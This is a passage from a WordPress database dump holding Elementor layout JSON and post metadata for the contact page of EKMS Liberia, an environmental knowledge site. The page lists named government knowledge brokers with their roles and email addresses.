id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/IMG_20200908_105852_513.jpg\",\"id\":3167},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br \\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/aw2.jpg\",\"id\":3171},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58adbac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(21933,3175,'_edit_lock','1629363776:42'),(21934,3175,'_edit_last','42'),(21935,3175,'_oembed_c2e441d740634225f9893b90bad67da8','{{unknown}}'),(21936,3175,'_oembed_c46396ab17198a28875ed27ad244ab34','{{unknown}}'),(21937,3175,'_oembed_9e3d267654ee0aac0be8160043c6a90e','{{unknown}}'),(21938,3175,'_oembed_a712b3e4443d55e2e124a6141a4e3da1','{{unknown}}'),(21939,3178,'_edit_lock','1629363532:42'),(21940,3178,'_edit_last','42'),(21941,3175,'_jetpack_related_posts_cache','a:1:{s:32:\"e10a3b1fd740b2839c10bb96f2e48dff\";a:2:{s:7:\"expires\";i:1627601503;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3675;}i:1;a:1:{s:2:\"id\";i:3698;}i:2;a:1:{s:2:\"id\";i:3673;}}}}'),(21942,3180,'_edit_lock','1629363493:42'),(21943,3180,'_edit_last','42'),(21944,3181,'_edit_lock','1629363447:42'),(21945,3181,'_edit_last','42'),(21946,3180,'_jetpack_related_posts_cache','a:1:{s:32:\"e10a3b1fd740b2839c10bb96f2e48dff\";a:2:{s:7:\"expires\";i:1626819641;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3181;}i:1;a:1:{s:2:\"id\";i:3704;}i:2;a:1:{s:2:\"id\";i:3175;}}}}'),(21947,3181,'_jetpack_related_posts_cache','a:1:{s:32:\"e10a3b1fd740b2839c10bb96f2e48dff\";a:2:{s:7:\"expires\";i:1628259260;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3704;}i:1;a:1:{s:2:\"id\";i:3178;}i:2;a:1:{s:2:\"id\";i:3058;}}}}'),(21948,3178,'_jetpack_related_posts_cache','a:1:{s:32:\"e10a3b1fd740b2839c10bb96f2e48dff\";a:2:{s:7:\"expires\";i:1627464550;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3704;}i:1;a:1:{s:2:\"id\";i:3181;}i:2;a:1:{s:2:\"id\";i:3707;}}}}'),(21949,3183,'_wp_attached_file','2020/10/AlFreeman.jpg'),(21950,3183,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:652;s:4:\"file\";s:21:\"2020/10/AlFreeman.jpg\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"AlFreeman-300x279.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:279;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"AlFreeman-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(21951,3184,'_elementor_edit_mode','builder'),(21952,3184,'_elementor_template_type','wp-page'),(21953,3184,'_elementor_version','3.0.12'),(21954,3184,'_wp_page_template','default'),(21955,3184,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp